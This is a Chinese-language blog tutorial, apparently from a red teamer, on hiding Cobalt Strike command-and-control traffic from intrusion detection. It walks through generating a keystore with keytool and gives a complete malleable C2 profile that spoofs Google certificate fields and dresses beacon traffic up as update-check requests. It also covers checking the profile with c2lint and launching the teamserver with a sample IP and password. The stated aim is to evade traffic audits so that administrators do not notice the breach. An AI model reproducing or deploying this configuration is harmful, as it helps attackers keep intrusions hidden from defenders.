介绍

cobalt strike 是很多红队的首选的攻击神器，在 APT 方面近几年应用范围很广，很多著名的团队都曾使用这个工具进行 APT，效果显著。导致很多 ids 入侵检测工具和流量检测工具已经可以拦截和发现，特别是流量方面，如果使用默认证书进行渗透和测试，特别在高度安全的环境下，好不容易找到一个突破口，因为证书没修改，被流量检测出来并进行拦截，检测报告将返回给管理员，管理员就能马上将缺口进行修复。那么红队之前的攻击就会付诸东流，攻击计划就要重新定。

流量加密传输已经成为现在红队的基本素养，生成证书修改 C2 profile 加密混淆 实际上就是对流量加密传输，目的逃逸流量安全审计，穿透检测器。

在运行 cobalt strike 默认使用的 cobaltstrike.store 证书，生成新证书的意义是将使用我们现在的制定好的证书。

开启加密之路

三台机器,c2服务器机器,客户端机器,受害机器

1. c2服务器,生成免费的SSL证书:

keytool -genkey -alias wkk -keyalg RSA -validity 36500 -keystore wkk.store

wkk wkk.store 两个字符串都要记住，因为修改profile要使用
输入密码  后提示地区信息 按照提示一步一步填写。
US google google US US CA
y  生成证书

2023-01-05T08:00:05.png

2. 设置配置文件,创建并修改C2-profile文件:

set sample_name "wkk POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
Firefox/24.0";
#设置证书
https-certificate {
set CN "US";
set O "google";
set C "CA";
set L "US";
set OU "google";
set ST "US";
set validity "365";
}#设置
code-signer{
set keystore "wkk.store";
set password "yftk123";
set alias "wkk";
}#指定 DNS beacon 不用的时候指定到 IP 地址
set dns_idle "8.8.4.4";
#每个单独 DNS 请求前强制睡眠时间
set dns_sleep "0";
#通过 DNS 上载数据时主机名的最大长度[0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php
/windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @
PC&wv=11&gr=backoff&bv=1.55&data=";
print;
} }
server {
output {
print;
} } }
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
} }
server {
header "Content-Type" "text/plain";
output {
base64;
print;
} } }

注意设置这两个地方

#设置证书
https-certificate {
set CN "US";
set O "google";
set C "CA";
set L "US";
set OU "google";
set ST "US";
set validity "365";
}
#设置证书和密码
code-signer{
set keystore "wkk.store";
set password "yftk123";
set alias "wkk";

2023-01-05T08:09:20.png

3.c2lint检测c2 profile文件是否可用:

./c2lint wkk.profile

2023-01-05T09:17:38.png

2023-01-05T08:12:31.png

4.配置teamserver文件运行上线 修改teamserer默认端口号:

这个是必须要改的,不然特征码就太大了

vim teamserver

2023-01-05T08:16:13.png

./teamserver 172.16.2.11 yftk123 wkk.profile

2023-01-05T09:04:19.png

4.客户端上线:

2023-01-05T08:24:17.png

2023-01-05T08:28:39.png

2023-01-05T08:36:04.png

2023-01-05T08:33:11.png

2023-01-05T08:33:34.png

2023-01-05T08:58:54.png

5.打开wireshark,cs执行命令:

2023-01-05T09:01:34.png

2023-01-05T09:01:21.png

后持续更新
反弹shell加密
MSF流量加密
CS生成证书是配置profile进行加密
CS域前置加密
腾讯云函数
......